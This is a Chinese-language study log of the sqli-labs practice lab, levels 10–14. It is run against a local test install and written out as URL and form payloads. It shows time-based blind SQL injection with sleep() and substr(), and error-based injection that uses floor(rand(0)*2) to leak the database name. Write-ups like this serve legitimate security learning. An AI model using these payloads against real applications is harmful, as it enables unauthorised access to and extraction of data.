sqli-labs学习记录(四)

0x10 less-10

http://localhost/sqli-labs-master/Less-10/?id=1" and sleep(5)-- + //判断后台闭合方式
http://localhost/sqli-labs-master/Less-10/?id=1" and if(substr((select database()),1,1)='s',sleep(5),null)-- +  //判断数据库等
http://localhost/sqli-labs-master/Less-10/?id=1" and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(5),null)-- +

0x11 less-11

从11关开始就由GET型注入变成POST注入了
sqli-labs学习记录(四)_第1张图片
sqli-labs学习记录(四)_第2张图片

一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的

利用盲注获取信息
sqli-labs学习记录(四)_第3张图片

0x12 less-12

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”“”) and password=(“”) LIMIT 0,1’ at line 1
由错误信息可以推断出后台句子,其他同less-11

0x13 less-13

这里开始急事正确也不返回信息了,这可怎么办呢,我们想起来之前第六课利用的基于错误的返回
利用到floor()、rand()等

sqli-labs学习记录(四)_第4张图片

') and (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2))) as c from information_schema.tables group by c)a)-- +

0x12 less-14

" and (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2))) as c from information_schema.columns group by c)a) -- +

sqli-labs学习记录(四)_第5张图片

你可能感兴趣的:(sql-injection)